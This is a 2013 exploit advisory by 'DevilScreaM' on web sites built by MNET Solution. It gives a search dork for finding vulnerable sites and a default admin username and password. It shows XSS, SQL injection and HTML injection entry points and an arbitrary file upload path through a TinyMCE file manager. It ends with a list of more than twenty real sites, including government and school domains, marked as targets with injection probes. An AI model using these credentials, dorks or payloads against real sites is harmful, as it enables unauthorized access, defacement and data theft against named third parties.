Sites designed by MNET Solution suffer from cross site scripting, html injection, remote shell upload, and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
b8a92e2dbe7f7eb98856ebc26a7aa2fb0838c901e135f2a0969a831c7662780c
#Title : MNET Solution Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 10/19/2013
#Category : Web Applications
#Type : PHP
#Vendor : https://mnet.co.th
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : XSS, SQL Injection, HTML Injection, Arbitrary File Upload
#Dork : inurl:webboard.php?option=answers
Default Admin Password
https://site-target/siteadmin/
Username : superadmin
Password : jocho
====================================================================================================
Cross Site Scripting
https://site-target/[PATH]/subindex.php?page=search&kword=[XSS]
Example at Web Vendor
https://mnet.co.th/2012/th/main/subindex.php?page=search&kword=<script>alert('DevilScreaM')</script>
====================================================================================================
SQL Injection Vulnerability
Vulnerable at 'webboard.php'
https://site-target/[PATH]/webboard.php?option=answers&qNo=[SQLI]
====================================================================================================
HTML Injection
Register to WebBoard, after Register, Create New Post
Go to https://site-target/[PATH]/webboard.php?#post
#NOTE
Register Page : https://site-target/subindex.php?page=member&task=new
====================================================================================================
Arbitrary File Upload
1. Login to Page Admin
2. After Login, go to https://site-target/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
3. Click Upload, And Upload Your HTML
4. Result Upload at
https://site-target/upfile/[YOURFILE].html
https://site-target/images/[YOURFILE].html
======================================================================================================
Example Target
https://tarbiah.ac.th/main/webboard.php?option=answers&qNo=20'
https://pasayyawo.go.th/main/webboard.php?option=answers&qNo=9'
https://anwarulislam.ac.th/main/webboard.php?option=answers&qNo=10'
https://pujud.go.th/main/webboard.php?option=answers&qNo=20'
https://npm.ac.th/en/webboard.php?option=answers&qNo=3'
https://klongchanak.go.th/2011/main/webboard.php?option=answers&qNo=20'
https://alfatihah.ac.th/main/webboard.php?option=answers&qNo=20'
https://halal.or.th/th/main/webboard.php?option=answers&qNo=20'
https://kpgt.co.th/en/main/webboard.php?option=answers&qNo=20'
https://startec.co.th/main/webboard.php?option=answers&qNo=13'
https://worldwidestudy.co.th/main/webboard.php?option=answers&qNo=4'
https://mrhalalfood.co.th/th/main/webboard.php?option=answers&qNo=1'
https://royalthaitour.com/ar/main/webboard.php?option=answers&qNo=2'
https://prosperfilms.com/en/main/webboard.php?option=answers&qNo=8'
https://halalscience.org/en/main/webboard.php?option=answers&qNo=2'
https://satelliteguidemag.com/main/webboard.php?option=answers&qNo=13'
https://jintakanitlanna.com/main/webboard.php?option=answers&qNo=63'
https://muslimchonburi.com/2011/main/webboard.php?option=answers&qNo=23'
https://fulfilacademy.com/main/webboard.php?option=answers&qNo=43'
https://st-arabian.com/main/webboard.php?option=answers&qNo=43'
https://thaipaki.com/main/webboard.php?option=answers&qNo=47'
https://ben-socks.com/th/main/webboard.php?option=answers&qNo=23'